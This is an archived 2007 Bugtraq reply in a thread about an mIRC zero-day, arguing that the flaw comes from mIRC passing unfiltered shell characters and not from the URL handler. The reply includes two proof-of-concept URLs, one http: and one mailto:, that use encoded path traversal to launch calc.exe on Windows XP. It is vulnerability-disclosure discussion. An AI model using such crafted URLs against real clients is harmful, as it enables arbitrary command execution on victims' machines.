Bugtraq mailing list archives
Re[2]: 0day: mIRC pwns Windows
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Thu, 4 Oct 2007 15:12:02 +0400
Dear Gavin Hanover, In this very case it's really seems to be mIRC problem ("unfiltered shell characters"). It doesn't depend on URL handler and will work with any valid URL handler. You can reproduce same vulnerability by entering http:%xx../../../../../../../../../../../windows/system32/calc.exe".bat Exploitable under Windows XP, not exploitable under Vista. --Wednesday, October 3, 2007, 11:59:45 PM, you wrote to jinc4fareijj () hotmail com: GH> is this a mirc bug or a mail client bug?
mailto:%xx../../../../../../../../../../../windows/system32/calc.exe".bat
-- ~/ZARAZA http://securityvulns.com/
Current thread:
- 0day: mIRC pwns Windows jinc4fareijj (Oct 03)
- Re: 0day: mIRC pwns Windows Gavin Hanover (Oct 03)
- Re[2]: 0day: mIRC pwns Windows 3APA3A (Oct 04)
- Re: 0day: mIRC pwns Windows Greg Rubin (Oct 04)
- Re: Re[2]: 0day: mIRC pwns Windows Gavin Hanover (Oct 04)
- Re[2]: 0day: mIRC pwns Windows 3APA3A (Oct 04)
- Re: 0day: mIRC pwns Windows Gregory Rubin (Oct 03)
- <Possible follow-ups>
- Re: 0day: mIRC pwns Windows Fred Elliot (Oct 04)
- Re: 0day: mIRC pwns Windows Gavin Hanover (Oct 03)